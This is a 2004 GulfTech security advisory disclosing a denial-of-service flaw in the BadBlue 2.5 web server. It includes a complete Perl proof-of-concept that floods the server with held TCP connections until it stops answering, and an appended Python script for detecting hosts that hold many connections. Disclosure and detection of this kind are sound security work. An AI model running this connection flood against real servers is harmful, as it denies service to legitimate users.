##########################################################
# GulfTech Security Research August, 18th 2004
##########################################################
# Vendor : BadBlue
# URL : http://www.badblue.com
# Version : BadBlue Webserver v2.5
# Risk : Denial of Service
##########################################################

Description:
Share photos, videos, music, and business files with friends
and colleagues instantly. Tired of paying a service to share
your files (and the hassle of sending your files to their
site)? BadBlue shares files directly from your own PC, using
the cable/DSL/broadband/dialup connection you already paid
for! BadBlue lets you run a no-hassle Web site on your own
PC for free, including a domain name you can choose. Within
seconds, you can transform your PC into a friendly, file
sharing Web server with all the power of a real server on the
Internet. Remote users can search for files, explore your
shared folders, and run full-blown applications created in
HTML, PHP, Perl, and so on.

Denial of Service:
BadBlue Webserver cannot handle multiple connections from the
same host, and will deny all access to any users at right around
twenty-four simultaneous connections. I have included a proof of
concept that floods the target server with a number of connections,
and then basically keeps those connections up for as long as you
specify, thus blocking all other traffic to the affected server.

#!/usr/bin/perl
##############################################################
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code
##############################################################
# BadBlue Web Server can not handle many simultaneous connects
# from the same host, and will lock up until the connects stop
##############################################################
# This Proof Of Concept Written By GulfTech Security Research
##############################################################
use Strict;
use Socket;
use IO::Socket;

# Arguments: host, port, number of connections, seconds to hold them
my $host = $ARGV[0];
my $port = $ARGV[1];
my $stop = $ARGV[2];
my $size = 1000;
my $prot = getprotobyname('tcp');
my $slep = $ARGV[3];

printf("================================================\n");
printf(" BadBlue v2.52 Web Server Denial Of Service POC \n");
printf("================================================\n");
printf("[*] Making %d Connections To %s \n", $stop , $host);

# Open the connections; the loop counter doubles as the socket handle name
for ($i=1; $i<$stop; $i++)
{
    socket($i, PF_INET, SOCK_STREAM, $prot );
    my $dest = sockaddr_in ($port, inet_aton($host));
    connect($i, $dest);
}

CheckServer($host, $i, $slep, $stop);
KillThreads($stop);
printf("[*] Exploit Attempt Unsuccessful");
exit;

# Send one more request; no reply means the server has stopped answering
sub CheckServer($host, $i, $slep, $stop) {
    ($host, $i, $slep, $stop) = @_;
    $blank = "\015\012" x 2;
    $request = "GET / HTTP/1.0".$blank;
    $remote = IO::Socket::INET->new( Proto => "tcp",
                                     PeerAddr => $host,
                                     PeerPort => $port,
                                     Timeout => '10000',
                                     Type => SOCK_STREAM,
                                   );
    print $remote $request;
    unless ( <$remote> )
    {
        printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);
        printf("[*] The Host Will Be Down For %d Seconds\n", $slep);
        sleep($slep);
        KillThreads($stop);
        exit;
    }
}

# Close every socket opened in the main loop
sub KillThreads($stop) {
    ($stop) = @_;    # list assignment: take the argument, not the argument count
    printf("[*] Killing All active Connections");
    for ($l=1; $l<$stop; $l++) {
        shutdown($l,2)|| die("Couldn't Shut Down Socket");
    }
}

Solution:
The development team has been contacted and said they will be
looking into this issue shortly. Users are advised to upgrade
as soon as possible.
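
While waiting for a vendor fix, an administrator can watch for the condition described under Denial of Service: a single remote host holding roughly two dozen connections to the web server port. The Python below is an added example and not part of the GulfTech advisory; the netstat sample is constructed, and the threshold of 20 and the function names are assumptions.

```python
from collections import Counter

# Constructed sample of Windows `netstat -an` output (not captured from a real host).
# 192.0.2.50 holds 24 established connections to port 80; 198.51.100.7 holds one.
SAMPLE = "\n".join(
    ["  Proto  Local Address          Foreign Address        State",
     "  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING"]
    + [f"  TCP    10.0.0.5:80            192.0.2.50:{40000 + n}       ESTABLISHED"
       for n in range(24)]
    + ["  TCP    10.0.0.5:80            198.51.100.7:51512     ESTABLISHED",
       "  TCP    10.0.0.5:80            198.51.100.7:51513     TIME_WAIT",
       "  TCP    10.0.0.5:445           192.0.2.50:49999       ESTABLISHED"]
)

# Assumption: alert a little below the ~24 connections the advisory reports.
THRESHOLD = 20


def connections_per_host(netstat_text, server_port=80,
                         states=("ESTABLISHED", "SYN_RECEIVED")):
    """Count open connections to server_port, grouped by remote address."""
    counts = Counter()
    for line in netstat_text.splitlines():
        fields = line.split()
        # Skip headers, UDP rows, listeners and sockets that are already closing.
        if len(fields) != 4 or fields[0] != "TCP" or fields[3] not in states:
            continue
        local, remote = fields[1], fields[2]
        # rpartition splits on the last colon, so "[::1]:80" is handled too.
        _, _, local_port = local.rpartition(":")
        remote_host, _, _ = remote.rpartition(":")
        if local_port == str(server_port):
            counts[remote_host] += 1
    return counts


def suspect_hosts(netstat_text, server_port=80, threshold=THRESHOLD):
    """Return {remote_host: count} for hosts holding >= threshold connections."""
    counts = connections_per_host(netstat_text, server_port)
    return {host: n for host, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for host, n in suspect_hosts(SAMPLE).items():
        print(f"{host} holds {n} connections to port 80")
```

Fed the live output of `netstat -an` on the server at a regular interval, the same functions report which source address to block or rate-limit at the firewall.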

Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00042-08202004

Credits:
James Bercegay of the GulfTech Security Research Team